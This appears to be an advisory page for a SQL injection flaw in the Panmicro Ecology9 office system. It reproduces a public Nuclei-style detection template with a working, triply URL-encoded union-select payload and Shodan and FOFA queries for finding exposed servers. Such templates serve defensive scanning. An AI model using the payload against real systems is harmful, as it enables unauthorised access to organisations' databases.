Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
PoC代码[已公开]
id: CNVD-2023-12632
info:
name: E-Cology V9 - SQL Injection
author: daffainfo
severity: high
description: |
Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
reference:
- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
- https://blog.csdn.net/qq_50854662/article/details/129992329
metadata:
verified: true
max-request: 1
shodan-query: 'ecology_JSessionid'
fofa-query: app="泛微-协同商务系统"
tags: cnvd,cnvd2023,ecology,sqli
# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times
http:
- raw:
- |
POST /mobile/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
matchers-condition: and
matchers:
- type: word
part: body
words:
- '283f42764da6dba2522412916b031080'
- '"autoCount"'
- '"autoGet"'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502206d854200689f5dd8a9a1083a50abc0f650f3a2c84a1a11d2a85f2ca14a30a77702210085c1fbc2b7b6228caa988c08cd8054c188291b682c5a46a825214c2c76d5922c:922c64590222798bb761d5b6d8e72950